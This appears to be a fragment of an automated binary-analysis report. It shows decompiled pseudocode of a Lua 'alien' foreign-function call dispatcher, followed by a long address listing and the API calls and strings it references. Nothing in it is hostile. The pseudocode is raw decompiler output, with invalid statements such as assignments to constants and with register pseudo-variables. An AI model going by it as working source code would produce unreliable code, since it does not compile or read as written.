								 *((intOrPtr*)(_t277 - 8)) = _t281;
								_push(_t247);
								_push(_t275);
								L00A23F68();
								_t281 = _t281 + 8;
								_t245 = E00A245C0(_t244, _t294);
								_t261 =  *((intOrPtr*)(_t277 - 8));
								_t263 =  *((intOrPtr*)(_t277 - 0xc));
								 *_t261 = _t245;
								 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + _t272)) = _t261;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L13:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L24:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								goto L0;
						}
					}
					L37:
					_t252 =  *((intOrPtr*)(_t277 - 0x14));
					 *((intOrPtr*)(_t277 - 0x3c)) = 0;
					_t227 =  *(_t252 + 0xc);
					if(_t227 > 0xc) {
						L58:
						_t228 =  *(_t252 + 8);
						if(_t228 == 0) {
							_t228 = "anonymous";
						}
						_push(_t228);
						_push("alien: unknown return type (function %s)");
						_push(_t275);
						L00A23F26();
						L61:
						_t282 = _t281 + 0xc;
						L62:
						 *((intOrPtr*)(_t277 - 0x24)) =  *((intOrPtr*)(_t277 - 0x24)) +  ~( *(_t277 - 0x48)) * 4;
						 *((intOrPtr*)(_t277 - 0x2c)) =  *((intOrPtr*)(_t277 - 0x2c)) -  *((intOrPtr*)(_t277 - 0x30));
						_t273 = 0;
						 *((intOrPtr*)(_t277 - 0x28)) =  *((intOrPtr*)(_t277 - 0x28)) +  ~( *(_t277 - 0x38)) * 4;
						if( *((intOrPtr*)(_t277 - 0x44)) <= 0) {
							L72:
							_pop(_t274);
							_pop(_t276);
							_pop(_t249);
							return E00A245A4( *((intOrPtr*)(_t277 - 0x30)) +  *((intOrPtr*)(_t277 - 0x34)) +  *(_t277 - 0x38) +  *(_t277 - 0x48) + 1, _t249,  *(_t277 - 4) ^ _t277,  *(_t277 - 0x48), _t274, _t276);
						} else {
							goto L63;
						}
						do {
							L63:
							_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x14)) + 0x30)) + _t273 * 4)) + 0xfffffff3;
							if(_t239 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t239 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t285 = _t282 - 8;
									 *_t285 = _t294;
									_push(_t275);
									L00A23F80();
									_t282 = _t285 + 0xc;
									 *((intOrPtr*)(_t277 - 0x24)) =  *((intOrPtr*)(_t277 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t273 = _t273 + 1;
						} while (_t273 <  *((intOrPtr*)(_t277 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t227 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t247, _t263, _t272, _t294,  *((intOrPtr*)(_t277 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x14)) + 4)), 0, _t272);
							_push(_t275);
							L00A23F74();
							_t282 = _t281 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a22309
0x00a22309
0x00a22309
0x00a22309
0x00a22309
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22320
0x00a22325
0x00a2233e
0x00a22343
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236f
0x00a22374
0x00a22376
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

Part of subcall function 00A24130: __alloca_probe_16.LIBCMT ref: 00A24160

lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Strings

alien_function, xrefs: 00A22339
alien_callback, xrefs: 00A22316
alien function or callback expected, xrefs: 00A2235D

Memory Dump Source

